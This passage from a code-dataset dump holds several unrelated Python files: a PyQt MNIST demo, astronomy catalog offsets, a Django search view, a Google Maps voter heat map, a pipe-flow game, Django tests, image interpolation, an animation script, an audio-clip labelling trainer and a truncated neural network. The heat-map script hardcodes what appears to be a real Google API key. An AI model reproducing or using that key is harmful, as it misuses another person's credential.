__init__(self):\n\t\tsuper().__init__()\n\t\tpixmap = QPixmap()\n\t\tself.setPixmap(pixmap)\n\t\tself.resize(pixmap.width(),pixmap.height())\n\t\tself.update()\n\nclass Window(QWidget):\n\t#Encapsulates the main window and its functionality\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.setFixedSize(700, 300)\t#our window is not resizable\n\t\tself.setGeometry(00, 00, 700, 300)\n\t\tself.initNet()\t\t\t\t#load network\n\n\t\tlayout = QGridLayout()\n\t\tlayout.setVerticalSpacing(30)\n\t\tself.setLayout(layout)\n\n\t\tself.drawArea = DrawArea()\n\t\tlayout.addWidget(self.drawArea, 0, 0 , 3, 1)\t#add draw area\n\n\t\tself.clear = QPushButton(\"Select random number\")\n\t\tlayout.addWidget(self.clear, 0, 1, 1, 1)\t\t#add button\n\t\tself.clear.clicked.connect(self.onClickClear)\t#connect trigger\n\n\t\tself.classify = QPushButton(\"Classify\")\n\t\tself.classify.setDisabled(True)\n\t\tlayout.addWidget(self.classify, 1, 1, 1, 1)\t\t#add button\n\t\tself.classify.clicked.connect(self.onClickClassify) #connect trigger\n\n\t\tself.label_1 = QLabel(\"Predicted class: \")\t\t#add label\n\t\tself.label_1.setFont(QtGui.QFont(None, 15, QtGui.QFont.Normal))\n\t\tlayout.addWidget(self.label_1, 2, 1, 1, 1)\n\t\t\n\t\tself.loadSet()\t#load dataset\n\t\tself.show()\t\t#show window\n\n\tdef loadSet(self):\n\t\t#Loads the dataset into network- readable form\n\t\twith open(\"dataset/mnist-tk.inp\") as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=' ')\n\t\t\tlineCount = 0\n\t\t\tself.dataset = []\n\t\t\tself.labels = []\n\t\t\tfor row in csv_reader:\t\t#for each row\n\t\t\t\tdataInt = []\n\t\t\t\tfor idx, num in enumerate(row):\n\t\t\t\t\tif idx == 784:\t\t#end of data line\n\t\t\t\t\t\tbreak\n\t\t\t\t\tdataInt.append(int(num))\n\t\t\t\tdata = np.array(dataInt)\n\t\t\t\tdata = data.reshape((28,28))\n\t\t\t\tself.dataset.append(data)\n\t\t\t\tlabel = np.zeros((10,1))\n\t\t\t\tlabel[int(row[786])][0] = 1\n\t\t\t\tlabel = label.reshape(10,)\t#turns out (10,1) != (10,)\n\t\t\t\tself.labels.append(label) \t\t\n\t\t\t\tlineCount += 1\n\n\t\t\tself.dataset = np.array(self.dataset)\n\t\t\tself.showSet = self.dataset\n\t\t\tself.dataset = (self.dataset / 255) - 0.5 #normalize to (-0.5,0.5)\n\t\t\tself.labels = np.array(self.labels)\n\t\n\t\n\tdef onClickClassify(self):\n\t\tresult = self.myNet.predict(self.image)\t\t#predict on a single data point\n\t\tself.label_1.setText(\"Predicted class: \" + str(result))\n\n\tdef onClickClear(self):\n\t\tself.classify.setDisabled(False)\n\t\tself.r = np.random.randint(0, 9999)\n\t\tself.image = self.dataset[self.r]\n\t\tnum = None\n\t\tfolder = None\n\t\tif(self.r < 1000):\t\t\t#Select the correct folder where the image is stored\n\t\t\tfolder = \"00000-00999\"\t\n\t\telif(self.r < 2000):\n\t\t\tfolder = \"01000-01999\"\n\t\telif(self.r < 3000):\n\t\t\tfolder = \"02000-02999\"\n\t\telif(self.r < 4000):\n\t\t\tfolder = \"03000-03999\"\n\t\telif(self.r < 5000):\n\t\t\tfolder = \"04000-04999\"\n\t\telif(self.r < 6000):\n\t\t\tfolder = \"05000-05999\"\n\t\telif(self.r < 7000):\n\t\t\tfolder = \"06000-06999\"\n\t\telif(self.r < 8000):\n\t\t\tfolder = \"07000-07999\"\n\t\telif(self.r < 9000):\n\t\t\tfolder = \"08000-08999\"\n\t\telse:\n\t\t\tfolder = \"09000-09999\"\n\n\t\tif self.r < 10:\n\t\t\tnum = \"0000\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\t\n\t\telif self.r\t< 100:\n\t\t\tnum = \"000\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\t\n\t\telif self.r < 1000:\n\t\t\tnum = \"00\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\t\n\t\telse:\n\t\t\tnum = \"0\" + str(self.r) + \"-\" + str(np.argmax(self.labels[self.r])) + \".gif\"\n\n\t\tpath = \tos.path.join(\"dataset\", \"t10k\", folder, num)\t#full path (os specific)\n\n\t\tpixmap = QPixmap(path)\t\t\t\t\t\t#display the number \n\t\tpixmap = pixmap.scaledToHeight(280)\n\t\tpixmap = pixmap.scaledToWidth(280)\n\t\tself.drawArea.setPixmap(pixmap)\n\t\tself.drawArea.resize(pixmap.width(),pixmap.height())\n\t\tself.drawArea.update()\n\t\t\t\t\n\n\tdef initNet(self):\n\t\t#loads the saved network from disk\n\t\tself.myNet = network.loadModel()\n\n\nif __name__ == '__main__':\n\tnp.random.seed(42)\n\tapp = QApplication(sys.argv)\n\twindow = Window()\n\t\n\tsys.exit(app.exec_())\n\t","repo_name":"Jakub-Svoboda/CNN-from-scratch","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13053293259","text":"import numpy as np\nfrom astropy.io import fits\nfrom hst_func import *\n\nworkdir = \"/Volumes/Spare Data/Hannah_Data/\"\ncatDir = \"matchForm/catDir/\"\n\n# Create list of images to be corrected\nimlist = [\"jdan03dpq\",\"jdan03drq\",\"jdan03dyq\",\"jdan03e3q\"]\n\n# Create corresponding list of filters (and offsets) to be applied to each image\nfilterlist = [\"F606W\", \"F606W\", \"F606W\", \"F606W\"]\n\noffsetlist = [20.0, 20.0, 20.0, 20.0] # This is in pixels/arcsec for ACS\n\n\n# Set indice ids to be used (xc, yc, xo, yo, id1 will all be created during this script)\nxr, yr, mag, id, xc, yc, xo, yo, id1 = 0, 1, 2, 3, 4, 5, 6, 7, 8\n\n\n# Set the pixel tolerance for matching sources together\n\nmatchtol = 1.0\n\nfor a in range(len(imlist)):\n\n## Load image\n tempim = fits.open(workdir+imlist[a]+\"_flc.fits\")\n xoff = float(tempim[0].header[\"POSTARG1\"])\n yoff = float(tempim[0].header[\"POSTARG2\"])\n\n\n## Load the respective catalog\n cat = np.loadtxt(workdir+catDir+imlist[a]+\"_ERIDANUS-III_F606W.dat\", comments=\"#\")\n\n## Apply offsets\n\n# Create an array for the new values\n newcol = np.zeros((len(cat),2))\n newcol[:,0] = cat[:,xc] - (offsetlist[a] * xoff)\n newcol[:,1] = cat[:,yc] - (offsetlist[a] * yoff)\n\n## Combine to single array and save out\n cat = np.hstack((cat, newcol))\n\n header = \"xr yr mag id xc yc xo yo\"\n np.savetxt(workdir +catDir+ imlist[a] + \"_offsetCor.dat\", cat, fmt=\"%1.5f\", header=header)\n","repo_name":"hrichstein/treasuryPipeline","sub_path":"erid-III-test.py","file_name":"erid-III-test.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3637825117","text":"from django.shortcuts import render\nfrom .models import Bb\n\n\ndef base(request):\n if request.POST:\n data_elements = []\n key = request.POST.get('field')\n value = request.POST.get('value').lower()\n for k in Bb.objects.all():\n if value in str(k.__getattribute__(key)).lower():\n data_elements.append(k)\n context = {'bb': data_elements}\n else:\n context = {'bb': Bb.objects.all().values('title', 'description', 'price', 'kind')}\n fields = {}\n for i in Bb._meta.fields:\n if i.name not in ('id', 'published'):\n fields[i.name] = i.verbose_name\n context['fields'] = zip(fields.keys(), fields.values())\n\n return render(request, 'bboard/base.html', context=context)\n","repo_name":"Girohirolook/django","sub_path":"bboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31300031164","text":"import pandas as pd\nimport googlemaps\nimport gmaps\n\nfrom GovExtraction import extractGovData\nfrom GoogleGeocodingApi import getLocationByPostalCode\nfrom ipywidgets.embed import embed_minimal_html\n\nAPI_KEY = \"AIzaSyB8xoaQ2tvLexzFIPbJQ0ttEHNCn1JYoHw\"\nlocations = {}\nlocations['lat'] = []\nlocations['lng'] = []\ntotal = []\n\ndef getLocationInfo():\n #Recupera os dados do site de eleitores na cidade de blumenau\n dataframe = extractGovData()\n addresses = dataframe['Endereço']\n postalCodes = dataframe['CEP']\n counts = dataframe['Total de Eleitores']\n for address, postalCode, count in zip(addresses, postalCodes, counts):\n #Através da API da google é recuperado a latitude e a longitude passando cep e endereço\n location = getLocationByPostalCode(str(postalCode) + ',' + address)\n locations['lat'].append(location.get('lat'))\n locations['lng'].append(location.get('lng'))\n total.append(count)\n\ndef drawHeatMap(zoom, intensity, radius):\n #Configuração da API do google\n gm = googlemaps.Client(key=API_KEY)\n gmaps.configure(api_key=API_KEY)\n #Utilizando o googlemaps é definido a visualização inicial do mapa de calor\n geocode_result = gm.geocode('Blumenau')[0]\n #Gera o mapa de calor a partir da latitude, longitude e a quantidade utilizando o gmaps\n center_lat=geocode_result['geometry']['location']['lat']\n center_lng=geocode_result['geometry']['location']['lng']\n heatmap_layer = gmaps.heatmap_layer(pd.DataFrame(locations), pd.DataFrame(total), dissipating = True)\n heatmap_layer.max_intensity = intensity\n heatmap_layer.point_radius = radius\n fig = gmaps.figure()\n fig = gmaps.figure(center = [center_lat,center_lng], zoom_level=zoom)\n fig.add_layer(heatmap_layer)\n #Exporta o mapa para um html, onde ao acessar é possível realzar o download em png\n embed_minimal_html('c:/temp/export.html', views=[fig])\n\ndef main():\n #Popular informações dos eleitores\n getLocationInfo()\n #Gerar o mapa de calor\n drawHeatMap(10, 5, 15)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Urahaa/python-projects","sub_path":"HeatMap/HeatMapGenerator.py","file_name":"HeatMapGenerator.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12861507021","text":"import pygame\n\nimport clock\nimport Game\n\nfrom GameObjects import PipeType\n\nclass Flow(object):\n def __init__(self, starting_x, starting_y, flowtime):\n\n self.starting_x = starting_x\n self.starting_y = starting_y\n self.flowtime = flowtime\n self.clock = clock.Clock()\n self.is_flowing = False\n self.x = self.starting_x\n self.y = self.starting_y\n\n\n def update(self, map, game):\n\n\n\n\n if not self.is_flowing:\n if (self.clock.elapsed() > 15000):\n\n self.clock.restart()\n self.is_flowing = True\n else:\n if(self.clock.elapsed() > self.flowtime):\n\n self.clock.restart()\n if (self.push_water(map) == False):\n game.stance.append(Game.GAME.GAMEOVER)\n\n self.gameover = True\n elif (self.x, self.y) == (map.cols -1, map.rows -1):\n game.stance.append(Game.GAME.WIN)\n self.change_image(map.get_pipe((map.cols -1, map.rows -1)))\n pygame.time.delay(5000)\n print(\"winner\")\n self.win = True\n self.is_flowing = False\n\n\n\n\n\n\n\n\n def push_water(self, map):\n\n up = (self.x,self.y-1)\n right = (self.x + 1,self.y)\n down = (self.x,self.y+1)\n left = (self.x - 1,self.y)\n current = (self.x, self.y)\n\n\n if map.correct_index(down) and self.flow_possible(map.get_pipe(current), map.get_pipe(down), 2):\n map.get_pipe(current).sequence[2] = 2\n map.get_pipe(down).sequence[0] = 2\n self.change_image(map.get_pipe(current))\n self.y += 1\n\n\n return True\n elif map.correct_index(right) and self.flow_possible(map.get_pipe(current), map.get_pipe(right), 1):\n map.get_pipe(current).sequence[1] = 2\n map.get_pipe(right).sequence[3] = 2\n self.change_image(map.get_pipe(current))\n self.x += 1\n return True\n\n elif map.correct_index(left) and self.flow_possible(map.get_pipe(current), map.get_pipe(left), 3):\n map.get_pipe(current).sequence[3] = 2\n map.get_pipe(left).sequence[1] = 2\n self.change_image(map.get_pipe(current))\n\n self.x -= 1\n return True\n elif map.correct_index(up) and self.flow_possible(map.get_pipe(current), map.get_pipe(up),0):\n map.get_pipe(current).sequence[0] = 2\n map.get_pipe(up).sequence[2] = 2\n self.change_image(map.get_pipe(current))\n\n self.y -= 1\n return True\n return False\n\n def change_image(self,pipe):\n if pipe.type == PipeType.STRAIGHT:\n pipe.type = PipeType.STRWATER\n elif pipe.type == PipeType.CORNER:\n pipe.type = PipeType.CORWATER\n\n def dry_pipe(self,map):\n for pipe in map:\n if pipe.type == PipeType.STRWATER:\n pipe.type = PipeType.STRAIGHT\n elif pipe.type == PipeType.CORWATER:\n pipe.type = PipeType.CORNER\n\n\n\n def flow_possible(self, pipe_out, pipe_in, direction):\n if direction == 0:\n if pipe_out.sequence[0] == pipe_in.sequence[2] == 1:\n return True\n else:\n return False\n if direction == 1:\n if pipe_out.sequence[1] == pipe_in.sequence[3] == 1:\n return True\n else:\n return False\n if direction == 2:\n if pipe_out.sequence[2] == pipe_in.sequence[0] == 1:\n return True\n else:\n return False\n if direction == 3:\n if pipe_out.sequence[3] == pipe_in.sequence[1] == 1:\n return True\n else:\n return False\n\n def reset(self, map_): #funkcja restartujaca mape, przepływ wody -> po kliknięciu Nowa gra\n self.clock.restart()\n self.x = self.starting_x\n self.y = self.starting_y\n self.is_flowing = False\n for pipe in map_:\n for i in range(4):\n if pipe.sequence[i] == 2:\n pipe.sequence[i] = 1\n\n\n","repo_name":"marikapartyka/Plumber","sub_path":"flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35059550960","text":"from unittest.mock import MagicMock\n\nfrom django.contrib.admin.models import LogEntry\n\nfrom elk.utils.testing import TestCase, create_customer, create_teacher\nfrom lessons import models as lessons\nfrom market import signals\nfrom market.models import Class, Subscription\nfrom products.models import Product1\n\n\nclass TestSubscriptionSignals(TestCase):\n fixtures = ('lessons', 'products')\n\n def setUp(self):\n self.customer = create_customer()\n self.subscription = Subscription(\n customer=self.customer,\n product=Product1.objects.get(pk=1),\n buy_price=150,\n )\n self.deactivator = create_customer().user\n\n def test_deactivation_signal_is_beeing_sent(self):\n handler = MagicMock()\n signals.subscription_deactivated.connect(handler)\n self.subscription.deactivate()\n self.assertEqual(handler.call_count, 1)\n\n def test_log_entry_creation(self):\n self.subscription.deactivate(user=self.deactivator)\n\n log_entry = LogEntry.objects.first()\n self.assertEqual(log_entry.user, self.deactivator)\n self.assertIn('deactivated', log_entry.change_message)\n\n\nclass TestClassSignals(TestCase):\n fixtures = ['lessons']\n\n def setUp(self):\n self.customer = create_customer()\n self.teacher = create_teacher(works_24x7=True)\n self.lesson = lessons.OrdinaryLesson.get_contenttype()\n\n def _buy_a_lesson(self):\n c = Class(\n customer=self.customer,\n lesson_type=self.lesson\n )\n c.save()\n return c\n\n def _schedule(self, c):\n c.schedule(\n teacher=self.teacher,\n date=self.tzdatetime(2032, 12, 1, 11, 30),\n allow_besides_working_hours=True,\n )\n c.save()\n c.refresh_from_db()\n self.assertTrue(c.is_scheduled)\n return c\n\n def test_scheduled_signal_is_beeing_sent(self):\n handler = MagicMock()\n c = self._buy_a_lesson()\n signals.class_scheduled.connect(handler)\n self._schedule(c)\n self.assertEqual(handler.call_count, 1)\n\n def test_scheduled_class_signal_called_once(self):\n handler = MagicMock()\n c = self._buy_a_lesson()\n signals.class_scheduled.connect(handler)\n self._schedule(c)\n self.assertEqual(handler.call_count, 1)\n\n for i in range(0, 5):\n c.save()\n\n self.assertEqual(handler.call_count, 1) # signal should be saved only once\n\n def test_cancellation_signal_is_beeing_sent(self):\n c = self._buy_a_lesson()\n self._schedule(c)\n handler = MagicMock()\n signals.class_cancelled.connect(handler)\n c.cancel()\n self.assertEqual(handler.call_count, 1)\n","repo_name":"die-trying/django-celery","sub_path":"market/tests/unit/tests_signals.py","file_name":"tests_signals.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"40"} +{"seq_id":"23508639916","text":"import numpy as np\nimport cv2\n\n\ndef bilinear_interpolation(img, input):\n src_height, src_width, channel = img.shape\n print('src_height:', src_height, 'src_width:', src_width, 'channel:', channel)\n new_height, new_width = input[1],input[0]\n print('new_height:', new_height, 'new_width:', new_width)\n if src_height == new_height and src_width == new_width:\n return img.copy()\n\n new_img = np.zeros((new_height, new_width, 3), dtype=img.dtype)\n s_height, s_width = float (src_height) / new_height, float (src_width) / new_width\n\n for i in range(channel):\n for cur_height in range(new_height):\n for cur_width in range(new_width):\n src_x = (cur_width + 0.5) * s_width - 0.5\n src_y = (cur_height + 0.5) * s_height - 0.5\n\n src_x0 = int(np.floor(src_x))\n src_x1 = min(src_x0 + 1, src_width - 1)\n src_y0 = int(np.floor(src_y))\n src_y1 = min(src_y0 + 1, src_height - 1)\n\n point0 = (src_x1 - src_x) * img[src_y0, src_x0, i] + (src_x - src_x0) * img[src_y0, src_x1, i]\n point1 = (src_x1 - src_x) * img[src_y1, src_x0, i] + (src_x - src_x0) * img[src_y1, src_x1, i]\n new_img[cur_height, cur_width, i] = int((src_y1 - src_y) * point0 + (src_y - src_y0) * point1)\n return new_img\n\n\nif __name__ == '__main__':\n img = cv2.imread('lenna.png')\n dst = bilinear_interpolation(img, (900, 900))\n cv2.imshow('bilinear interp', dst)\n cv2.waitKey()\n","repo_name":"OMG1-1/badou-ai-special-2023","sub_path":"105-罗浩华-深圳/第二周/bilinear_interpolation.py","file_name":"bilinear_interpolation.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"17987436523","text":"from pickle import load\nimport matplotlib as mpl\nimport matplotlib.animation as animation\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\nwith open(\"AnimationData.pickle\", 'rb') as handle:\n lists = load(handle)\nparameters, timeframes = lists\n\"\"\"\nparameters contains all information about the simulation needed to make animation.\ntimeframes[0] = xpos, ypos, valE, \nwhere xpos, ypos give the positions of each electron, \nand valE give the values of external E field where sampled\n\"\"\"\n\nxmin, xmax, ymin, ymax, xposE = parameters\nmpl.rcParams['savefig.facecolor'] = 'white'\nfig, ax = plt.subplots()\noffset = 0\n\n\ndef animate(frame_nb):\n frame = timeframes[frame_nb]\n xpos, ypos, valE = frame\n valE = np.array(valE)\n ax.clear()\n ax.set_xlim(xmin-offset,xmax+offset)\n ax.set_ylim(ymin-offset,ymax+offset)\n ax.set_xlabel(\"X [µm]\")\n ax.set_ylabel(\"Y [µm]\")\n ax.scatter(xpos, ypos,color=\"black\",s=5, zorder=200)\n if not np.all(valE == 0):\n ax.set_title(\"External field: up = blue, down = red\")\n plus = valE > 0\n minus = valE < 0\n plt.scatter(xposE[plus],0*xposE[plus],color=\"blue\")\n plt.scatter(xposE[minus],0*xposE[minus],color=\"red\")\n\n\nprint(\"Starting animation compilation\")\nanime = animation.FuncAnimation(fig, animate, frames=len(timeframes), interval=1)\nanime.save(\"(To rename) Electron dynamics.gif\", writer='pillow')\nprint(\"Animation saved successfully\")","repo_name":"Illuminati2126/Project-PHYS512","sub_path":"Animation.py","file_name":"Animation.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5984376604","text":"\"\"\"Main training app.\"\"\"\nfrom __future__ import unicode_literals, print_function\nimport os\nimport sys\nfrom argparse import ArgumentParser\n\nimport urwid\nimport librosa\nimport numpy as np\nimport tables as tb\n\nimport umdone.io\nfrom umdone import cli\nfrom umdone import dtw\nfrom umdone import sound\nfrom umdone import segment\n\n\nclass TrainerModel(object):\n\n max_val = 1\n min_val = -1\n valid_categories = (\n (0, 'word'),\n (1, 'ummm'),\n (2, 'like'),\n (3, 'other non-word'),\n )\n\n def __init__(self, fname, window_length=0.05, threshold=0.01, n_mfcc=13):\n # settings\n self.filename = fname\n self.window_length = window_length\n self.threshold = threshold\n self.n_mfcc = n_mfcc\n\n # data\n self.current_segment = 0\n self.raw, self.sr = librosa.load(fname, mono=True, sr=None)\n self.bounds = segment.boundaries(self.raw, self.sr, window_length=window_length, \n threshold=threshold)\n self.nsegments = len(self.bounds)\n self.runtime = len(self.raw) / self.sr\n\n # results, keyed by current segement\n self.categories = {}\n\n @property\n def clip(self):\n l, u = self.bounds[self.current_segment]\n return self.raw[l:u]\n\n def segement_order(self):\n return sorted(self.categories.keys())\n\n def compute_mfccs(self, callback=None):\n sr = self.sr\n n_mfcc = self.n_mfcc\n n = len(self.categories)\n self.mfccs = mfccs = []\n order = self.segement_order()\n for status, seg in enumerate(order, start=1):\n l, u = self.bounds[seg]\n clip = self.raw[l:u]\n mfcc = librosa.feature.mfcc(clip, sr, n_mfcc=n_mfcc).T\n mfccs.append(mfcc)\n if callback is not None:\n callback(status/n)\n return mfccs\n\n def compute_distances(self, outfile, callback=None):\n mfccs = self.mfccs\n if os.path.isfile(outfile):\n mfccs = umdone.io._load_mfccs(outfile) + mfccs\n self.distances = dtw.distance_matrix(mfccs, callback=callback)\n return self.distances\n\n def save(self, outfile):\n order = self.segement_order()\n cats = [self.categories[seg] for seg in order]\n umdone.io.save(outfile, self.mfccs, cats, distances=self.distances)\n\n\nclass TrainerView(urwid.WidgetWrap):\n \"\"\"\n A class responsible for providing the application's interface and\n graph display.\n \"\"\"\n palette = [\n ('body', 'black', 'light gray', 'standout'),\n ('header', 'white', 'dark red', 'bold'),\n ('screen edge', 'light blue', 'dark cyan'),\n ('main shadow', 'dark gray', 'black'),\n ('line', 'black', 'light gray', 'standout'),\n ('bg background','light gray', 'black'),\n ('bg 1', 'black', 'dark blue', 'standout'),\n ('bg 1 smooth', 'dark magenta', 'black'),\n ('bg 2', 'black', 'dark cyan', 'standout'),\n ('bg 2 smooth', 'dark cyan', 'black'),\n ('button normal','light gray', 'dark blue', 'standout'),\n ('button select','white', 'dark green'),\n ('line', 'black', 'light gray', 'standout'),\n ('pg normal', 'white', 'black', 'standout'),\n ('pg complete', 'white', 'dark magenta'),\n ('pg smooth', 'dark magenta','black'),\n ]\n\n graph_num_bars = 100\n\n def __init__(self, controller):\n self.controller = controller\n self.status = urwid.Text(\"Status\")\n super(TrainerView, self).__init__(self.main_window())\n\n def update_graph(self):\n nbars = self.graph_num_bars\n d = np.abs(self.controller.model.clip)\n win_size = int(len(d) / nbars)\n d = d[:win_size*nbars]\n d.shape = (nbars, win_size)\n d = d.sum(axis=1)\n l = []\n max_value = d.max()\n for n, value in enumerate(d): # toggle between two bar colors\n if n & 1:\n l.append([0, value])\n else:\n l.append([value, 0])\n self.graph.set_data(l, max_value)\n\n def update_status(self):\n model = self.controller.model\n if model.current_segment in model.categories:\n c = model.valid_categories[model.categories[model.current_segment]][1]\n c = 'Categorized as ' + c\n else:\n c = 'Uncategorized'\n s = (\"Clip {0} of {1}\\n\"\n \"Duration {2:.3} sec\\n\"\n \"{3}\"\n ).format(model.current_segment + 1, model.nsegments, \n len(model.clip) / model.sr, c)\n self.status.set_text(s)\n\n def update_progress(self):\n model = self.controller.model\n self.progress.set_completion(model.bounds[model.current_segment][0]/model.sr)\n\n def update_segment(self):\n self.update_graph()\n self.update_status()\n self.update_progress()\n\n def on_nav_button(self, button, offset):\n self.controller.offset_current_segment(offset)\n\n def on_cat_button(self, button, i):\n self.controller.select_category(i)\n\n def on_unicode_checkbox(self, w, state):\n self.graph = self.bar_graph(state)\n self.graph_wrap._w = self.graph\n self.update_graph()\n\n def main_shadow(self, w):\n \"\"\"Wrap a shadow and background around widget w.\"\"\"\n bg = urwid.AttrWrap(urwid.SolidFill(\"\\u2592\"), 'screen edge')\n shadow = urwid.AttrWrap(urwid.SolidFill(\" \"), 'main shadow')\n bg = urwid.Overlay(shadow, bg,\n ('fixed left', 3), ('fixed right', 1),\n ('fixed top', 2), ('fixed bottom', 1))\n w = urwid.Overlay(w, bg,\n ('fixed left', 2), ('fixed right', 3),\n ('fixed top', 1), ('fixed bottom', 2))\n return w\n\n def bar_graph(self, smooth=False):\n satt = None\n if smooth:\n satt = {(1,0): 'bg 1 smooth', (2,0): 'bg 2 smooth'}\n w = urwid.BarGraph(['bg background', 'bg 1', 'bg 2'], satt=satt)\n return w\n\n def button(self, t, fn, *args, **kwargs):\n w = urwid.Button(t, fn, *args, **kwargs)\n w = urwid.AttrWrap(w, 'button normal', 'button select')\n return w\n\n def progress_bar(self, done=1, smooth=False):\n if smooth:\n return urwid.ProgressBar('pg normal', 'pg complete', 0, done, 'pg smooth')\n else:\n return urwid.ProgressBar('pg normal', 'pg complete', 0, done)\n\n def save_and_exit_program(self, w):\n # replace progress bar\n self.progress = self.progress_bar(done=1.0)\n self.progress_wrap._w = self.progress\n # save and exit\n self.controller.save()\n self.exit_program(w)\n\n def exit_program(self, w):\n raise urwid.ExitMainLoop()\n\n def graph_controls(self):\n # setup category buttons\n vc = self.controller.model.valid_categories\n self.category_buttons = [self.button(cat, self.on_cat_button, i) \n for i, cat in vc]\n # setup animate button\n nav_controls = urwid.GridFlow([\n self.button(\" prev \", self.on_nav_button, -1),\n self.button(\"replay\", self.on_nav_button, 0),\n self.button(\" next \", self.on_nav_button, 1),\n ], 10, 3, 0, 'center')\n\n self.progress = self.progress_bar(done=self.controller.model.runtime)\n self.progress_wrap = urwid.WidgetWrap(self.progress)\n\n l = [urwid.Text(\"Categories\", align=\"center\")]\n l += self.category_buttons\n l += [urwid.Divider(),\n urwid.Text(\"Navigation\", align=\"center\"),\n nav_controls,\n urwid.Divider(),\n urwid.LineBox(self.status),\n urwid.Divider(),\n self.progress_wrap,\n urwid.Divider(),\n self.button(\"Save and quit\", self.save_and_exit_program),\n self.button(\"Quit without saving\", self.exit_program),\n ]\n w = urwid.ListBox(urwid.SimpleListWalker(l))\n return w\n\n def main_window(self):\n self.graph = self.bar_graph()\n self.graph_wrap = urwid.WidgetWrap(self.graph)\n vline = urwid.AttrWrap(urwid.SolidFill('\\u2502'), 'line')\n c = self.graph_controls()\n w = urwid.Columns([('weight', 1, self.graph_wrap),\n ('fixed', 1, vline), (42, c)],\n dividechars=1, focus_column=2)\n w = urwid.Padding(w, ('fixed left', 1), ('fixed right', 1))\n w = urwid.AttrWrap(w,'body')\n w = urwid.LineBox(w)\n w = urwid.AttrWrap(w,'line')\n w = self.main_shadow(w)\n return w\n\n\nclass TrainerDisplay(object):\n\n def __init__(self, ns):\n self.ns = ns\n self.model = TrainerModel(ns.input, window_length=ns.window_length, \n threshold=ns.noise_threshold, n_mfcc=ns.n_mfcc)\n self.view = TrainerView(self)\n self.view.update_segment()\n\n def select_category(self, cat):\n s = self.model.current_segment \n self.model.categories[s] = cat\n self.select_segment(s+1)\n\n def select_segment(self, s):\n if s < 0:\n s = 0\n elif s >= self.model.nsegments:\n s = self.model.nsegments - 1\n self.model.current_segment = s\n clip = self.model.clip\n self.view.update_segment()\n self.loop.set_alarm_in(0.001, lambda w, d: sound.play(clip, self.model.sr))\n\n def offset_current_segment(self, offset):\n s = self.model.current_segment\n s += offset\n self.select_segment(s)\n\n def save(self):\n model = self.model\n view = self.view\n view.status.set_text('\\nComputing MFCCs\\n')\n model.compute_mfccs(view.progress.set_completion)\n view.status.set_text('\\nComputing distance matrix\\n')\n model.compute_distances(self.ns.output, view.progress.set_completion)\n view.status.set_text('\\nSaving\\n')\n model.save(self.ns.output)\n\n def main(self):\n self.loop = urwid.MainLoop(self.view, self.view.palette, pop_ups=True)\n self.loop.set_alarm_in(0.001, lambda w, d: self.select_segment(0))\n self.loop.run()\n\n\ndef add_arguments(parser):\n cli.add_output(parser)\n cli.add_window_length(parser)\n cli.add_noise_threshold(parser)\n cli.add_n_mfcc(parser)\n cli.add_input(parser)\n\n\ndef main(ns=None, args=None):\n \"\"\"Entry point for umdone trainer.\"\"\"\n if ns is None:\n parser = ArgumentParser('umdone-trainer')\n add_arguments(parser)\n ns = parser.parse_args(args)\n if ns.output is None:\n ns.output = '{0}-umdone-training.h5'.format(os.path.splitext(ns.input)[0])\n TrainerDisplay(ns).main()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"111t8e/umdone","sub_path":"umdone/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13277609579","text":"import numpy as np\nimport scipy.special as ss\n\n# neural network class definition\nclass StockBot:\n\n # initialise the neural network\n def __init__(self, hiddennodes, nhiddenlayers, nhiddenoutputs, learningrate):\n # set number of nodes in each input, hidden, and output layer\n self.inodes = 5 + nhiddenoutputs\n self.hnodes = hiddennodes\n self.onodes = 5 + nhiddenoutputs\n\n # number of hidden layers & hidden in/outputs\n self.nhlayers = nhiddenlayers\n self.nhout = nhiddenoutputs\n\n # initial weight matricies\n self.wih = np.random.normal(0.0, pow(self.hnodes, -0.5), (self.hnodes, self.inodes))\n self.whh = [np.random.normal(0.0, pow(self.hnodes, -0.5), (self.hnodes, self.hnodes)) for i in range(self.nhlayers - 1)]\n self.who = np.random.normal(0.0, pow(self.onodes, -0.5), (self.onodes, self.hnodes))\n self.wm = [self.wih] + self.whh + [self.who]\n\n # learning rate\n self.lr = learningrate\n \n # activation function is the sigmoid function\n self.activation_function = lambda x: ss.expit(x)\n\n pass\n\n # train the neural network\n def train(self, inputs_list):\n for train_cycle in range(10):\n\n next_hinputs = [0 for i in range(self.nhout)]\n for dat in range(200): #len(inputs_list) - 2\n # Cycles through two inputs in the time series, using backprop into the prior time element\n two_cycle_outputs = []\n two_cycle_targets = [] \n\n for two_cycle in range(2):\n # append 0 * the number of hidden inputs to the input list, next_hinputs changes depending on time-step\n inputs = np.array(np.append(inputs_list[dat + two_cycle], next_hinputs), ndmin = 2).T\n # output list for all layers to be used in backprop\n output_list = 